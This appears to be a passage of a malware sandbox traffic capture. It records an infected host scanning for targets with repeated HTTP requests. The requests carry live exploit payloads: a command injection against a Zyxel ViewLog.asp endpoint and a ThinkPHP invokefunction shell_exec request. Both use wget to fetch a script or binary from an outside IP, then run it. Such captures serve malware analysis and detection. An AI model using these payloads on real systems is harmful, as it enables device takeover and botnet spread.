                                                              Nov 13, 2023 22:19:51.366913080 CET13780OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.462388992 CET14274OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.397357941 CET15300OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.267313004 CET17297OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:52.286904097 CET20679OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              68192.168.2.235712831.136.44.128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.058989048 CET2575OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:23.318474054 CET2945OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:29.457878113 CET3701OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:41.488075018 CET5157OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.804888010 CET8184OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.950476885 CET14255OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              680192.168.2.235061494.121.66.1828080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.379975080 CET13371OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              681192.168.2.2339892112.126.145.2580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.547085047 CET13375OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.861511946 CET13484INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:15:22 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              682192.168.2.2341920112.213.101.25480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.556197882 CET13376OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.879842997 CET13485INHTTP/1.1 400 Bad Request
                                                              Server: AWS
                                                              Date: Mon, 13 Nov 2023 21:19:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 41 57 53 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>AWS</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              683192.168.2.2350536112.240.60.2280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.605221033 CET13376OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.978008986 CET13487INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 2830
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 31 3a 31 39 3a 34 38 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 66 4d 45 34 30 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68
                                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Mon, 13 Nov 2023 21:19:48 GMT<br><span class="F">IP: 156.146.49.168</span>Node information: PS-000-01fME40<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp Th
                                                              Nov 13, 2023 22:19:48.978038073 CET13488INData Raw: 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 52 61 6e 67 65 20 49 6e 76 61 6c 69 64 3c 2f 6c 69 3e 3c
                                                              Data Ascii: n hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return document.getElementById(i);
                                                              Nov 13, 2023 22:19:48.978091002 CET13489INData Raw: 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 35 32 39 32 66 34 5f 50 53 2d 30 30 30 2d 30 31 66 4d 45 34 30 5f 31 30 39 34 31 2d 32 35 32 30 34 0a
                                                              Data Ascii: inkPHP ; rm -rf thinkphp'<br>Request-Id: 655292f4_PS-000-01fME40_10941-25204<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hide_me P H"><div class="K">ERROR</div><p c
                                                              Nov 13, 2023 22:19:49.081326008 CET13493INData Raw: 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 52 61 6e 67 65 20 49 6e 76 61 6c 69 64 3c 2f 6c 69 3e 3c
                                                              Data Ascii: n hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return document.getElementById(i);
                                                              Nov 13, 2023 22:19:49.288357973 CET13502INData Raw: 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 52 61 6e 67 65 20 49 6e 76 61 6c 69 64 3c 2f 6c 69 3e 3c
                                                              Data Ascii: n hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return document.getElementById(i);


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              684192.168.2.2350544112.240.60.2280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.837493896 CET13483OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:49.210561991 CET13497INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 2830
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 31 3a 31 39 3a 34 39 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 